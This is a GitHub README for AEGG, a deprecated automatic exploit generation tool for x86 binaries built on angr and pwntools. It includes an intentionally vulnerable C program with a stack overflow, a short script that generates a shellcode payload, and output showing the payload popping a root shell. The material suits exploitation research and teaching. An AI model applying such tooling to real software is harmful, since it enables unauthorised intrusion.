Skip to content

YSc21/aegg

Repository files navigation

AEGG

AEGG is my simple automatic exploit generation tool. Now only support x86 binary.

Usage

  1. vi vul.c:
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    
    char buf[100];
    
    int sample_func() {
        char name[10] = {0};
        read(0, buf, 307);
        strcpy(name, buf);
        printf("input: %s\n", name);
    }
    
    int main(void)
    {
        printf("Running...\n");
        sample_func();
        printf("Done.\n");
    }
    
  2. complie vul:
    gcc vul2.c -o vul2 -m32 -g -z execstack
    
  3. vi my_aegg.py:
    from aegg import AEGG
    
    binary = './vul'
    gg = AEGG(binary)
    
    # generating payload!
    gg.hack()
    
    print repr(gg.payloads[0].content)
    gg.save()
    

Result

$ python my_aegg.py
...
INFO    | 2016-06-18 00:10:11,717 | aegg.aegg | Start hacking ...
INFO    | 2016-06-17 23:44:43,872 | pwnlib.elf | Stack is executable!
[+] Started program './vul'
INFO    | 2016-06-17 23:44:46,974 | pwnlib.tubes.process | Started program './vul'
[*] Stopped program './vul'
INFO    | 2016-06-17 23:44:47,976 | pwnlib.tubes.process | Stopped program './vul'
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Generated!
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Completed.
$
$ (cat ./vul.exp; cat) | ./vul
Running...
input: jhh///sh/bin��1�j
                           �̀ÿ @@   @
id
uid=0(root) gid=0(root) groups=0(root)

Dependences

  • angr
  • pwntools

TODO

  • shellcode (ret2stack)

  • ROP (ret2libc)

  • ROPgadget

  • fmtstr exploit

  • AEGG: inputs in exploit_gen instead of paths (for fuzzing)

  • ret2stack: try every buffer

  • ret2stack: nop-sled

Reference

angr-doc/examples/insomnihack_aeg

(State of) The Art of War: Offensive Techniques in Binary Analysis

AEG: Automatic Exploit Generation

About

my automatic exploit generation (DEPRECATED)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages